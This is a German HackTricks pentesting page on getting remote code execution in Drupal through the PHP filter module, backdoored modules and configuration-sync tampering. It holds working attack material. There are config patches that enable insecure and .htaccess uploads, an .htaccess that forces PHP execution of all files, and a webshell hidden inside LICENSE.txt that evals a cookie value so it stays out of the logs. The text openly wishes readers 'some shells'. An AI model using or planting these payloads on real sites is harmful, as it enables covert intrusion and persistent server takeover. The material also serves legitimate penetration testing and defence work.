Drupal RCE
Reading time: 8 minutes
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
Mit dem PHP-Filtermodul
warning
In älteren Versionen von Drupal (vor Version 8) war es möglich, sich als Admin anzumelden und das PHP-Filter
-Modul zu aktivieren, das "Eingebetteten PHP-Code/Snippets die Auswertung erlaubt." Ab Version 8 ist dieses Modul jedoch nicht standardmäßig installiert.
- Gehe zu /modules/php und wenn ein 403-Fehler zurückgegeben wird, dann ist das PHP-Filter-Plugin installiert und du kannst fortfahren
- Wenn nicht, gehe zu
Modules
und aktiviere das Kästchen vonPHP Filter
und klicke dann aufSave configuration
- Um es auszunutzen, klicke auf
Add content
, wähle dannBasic Page
oderArticle
und schreibe die PHP-Hintertür, wähle dannPHP
-Code im Textformat und schließlichPreview
- Um es auszulösen, greife einfach auf den neu erstellten Knoten zu:
curl http://drupal.local/node/3
Installieren des PHP-Filtermoduls
warning
In aktuellen Versionen ist es nicht mehr möglich, Plugins nur mit Zugriff auf das Web nach der Standardinstallation zu installieren.
Ab Version 8 ist das PHP-Filter Modul nicht standardmäßig installiert. Um diese Funktionalität zu nutzen, müssten wir das Modul selbst installieren.
- Laden Sie die neueste Version des Moduls von der Drupal-Website herunter.
wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
- Gehen Sie nach dem Herunterladen zu
Verwaltung
>Berichte
>Verfügbare Updates
. - Klicken Sie auf
Durchsuchen
, wählen Sie die Datei aus dem Verzeichnis aus, in das wir sie heruntergeladen haben, und klicken Sie dann aufInstallieren
. - Sobald das Modul installiert ist, können wir auf
Inhalt
klicken und eine neue einfache Seite erstellen, ähnlich wie wir es im Drupal 7-Beispiel gemacht haben. Achten Sie erneut darauf,PHP-Code
aus dem Dropdown-MenüTextformat
auszuwählen.
Hintertür-Modul
warning
In aktuellen Versionen ist es nicht mehr möglich, Plugins nur mit Zugriff auf das Web nach der Standardinstallation zu installieren.
Es war möglich, ein Modul herunterzuladen, eine Hintertür hinzuzufügen und es zu installieren. Zum Beispiel, das Herunterladen des Trurnstile Moduls im komprimierten Format, das Erstellen einer neuen PHP-Hintertürdatei darin, die den Zugriff auf die PHP-Datei mit einer .htaccess
-Datei ermöglicht:
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / </IfModule>
Und dann gehen wir zu http://drupal.local/admin/modules/install
, um das mit einem Backdoor versehene Modul zu installieren und auf /modules/turnstile/back.php
zuzugreifen, um es auszuführen.
Backdooring Drupal mit Konfigurationssynchronisation
Beitrag geteilt von Coiffeur0x90
Teil 1 (Aktivierung von Media und Media Library)
Im Menü Erweitern (/admin/modules) können Sie aktivieren, was wie bereits installierte Plugins aussieht. Standardmäßig scheinen die Plugins Media und Media Library nicht aktiviert zu sein, also lassen Sie uns diese aktivieren.
Vor der Aktivierung:
Nach der Aktivierung:
Teil 2 (Nutzung der Funktion Konfigurationssynchronisation)
Wir werden die Funktion Konfigurationssynchronisation nutzen, um Drupal-Konfigurationseinträge zu dumpen (exportieren) und hochzuladen (importieren):
- /admin/config/development/configuration/single/export
- /admin/config/development/configuration/single/import
Patch system.file.yml
Lassen Sie uns mit dem Patchen des ersten Eintrags allow_insecure_uploads
beginnen von:
Datei: system.file.yml
...
allow_insecure_uploads: false
...
Zu:
Datei: system.file.yml
...
allow_insecure_uploads: true
...
Patch field.field.media.document.field_media_document.yml
Dann patchen Sie den zweiten Eintrag file_extensions
von:
Datei: field.field.media.document.field_media_document.yml
...
file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
...
Zu:
Datei: field.field.media.document.field_media_document.yml
...
file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
...
Ich verwende es in diesem Blogbeitrag nicht, aber es wird angemerkt, dass es möglich ist, den Eintrag
file_directory
beliebig zu definieren und dass er anfällig für einen Path Traversal-Angriff ist (so können wir im Drupal-Dateisystembaum nach oben navigieren).
Teil 3 (Nutzung der Funktion Dokument hinzufügen)
Der letzte Schritt ist der einfachste und wird in zwei Unter Schritte unterteilt. Der erste besteht darin, eine Datei im .htaccess-Format hochzuladen, um die Apache-Direktiven zu nutzen und .txt-Dateien vom PHP-Engine interpretieren zu lassen. Der zweite besteht darin, eine .txt-Datei hochzuladen, die unser Payload enthält.
Datei: .htaccess
<Files *>
SetHandler application/x-httpd-php
</Files>
# Vroum! Vroum!
# We reactivate PHP engines for all versions in order to be targetless.
<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php5.c>
php_flag engine on
</IfModule>
Warum ist dieser Trick cool?
Weil, sobald die Webshell (die wir LICENSE.txt nennen) auf dem Webserver abgelegt ist, können wir unsere Befehle über $_COOKIE
übertragen und in den Webserver-Protokollen wird dies als legitime GET-Anfrage an eine Textdatei angezeigt.
Warum nennen wir unsere Webshell LICENSE.txt?
Einfach, weil wir die folgende Datei nehmen, zum Beispiel core/LICENSE.txt (die bereits im Drupal-Kern vorhanden ist), haben wir eine Datei mit 339 Zeilen und 17,6 KB Größe, die perfekt ist, um einen kleinen PHP-Code-Schnipsel in der Mitte hinzuzufügen (da die Datei groß genug ist).
Datei: Patched LICENSE.txt
...
this License, you may choose any version ever published by the Free Software
Foundation.
<?php
# We inject our payload into the cookies so that in the logs of the compromised
# server it shows up as having been requested via the GET method, in order to
# avoid raising suspicions.
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
} else {
phpinfo();
}
}
?>
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
...
Teil 3.1 (Datei .htaccess hochladen)
Zuerst nutzen wir die Funktion Dokument hinzufügen (/media/add/document), um unsere Datei mit den Apache-Direktiven (.htaccess) hochzuladen.
Teil 3.2 (Datei LICENSE.txt hochladen)
Dann nutzen wir erneut die Funktion Dokument hinzufügen (/media/add/document), um eine Webshell, die in einer Lizenzdatei versteckt ist, hochzuladen.
Teil 4 (Interaktion mit der Webshell)
Der letzte Teil besteht darin, mit der Webshell zu interagieren.
Wie im folgenden Screenshot gezeigt, erhalten wir das nachfolgende Ergebnis, wenn das von unserer Webshell erwartete Cookie nicht definiert ist, während wir die Datei über einen Webbrowser aufrufen.
Wenn der Angreifer das Cookie setzt, kann er mit der Webshell interagieren und beliebige Befehle ausführen.
Und wie Sie in den Protokollen sehen können, scheint es, als wäre nur eine txt-Datei angefordert worden.
Vielen Dank, dass Sie sich die Zeit genommen haben, diesen Artikel zu lesen. Ich hoffe, er hilft Ihnen, einige Shells zu erhalten.
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.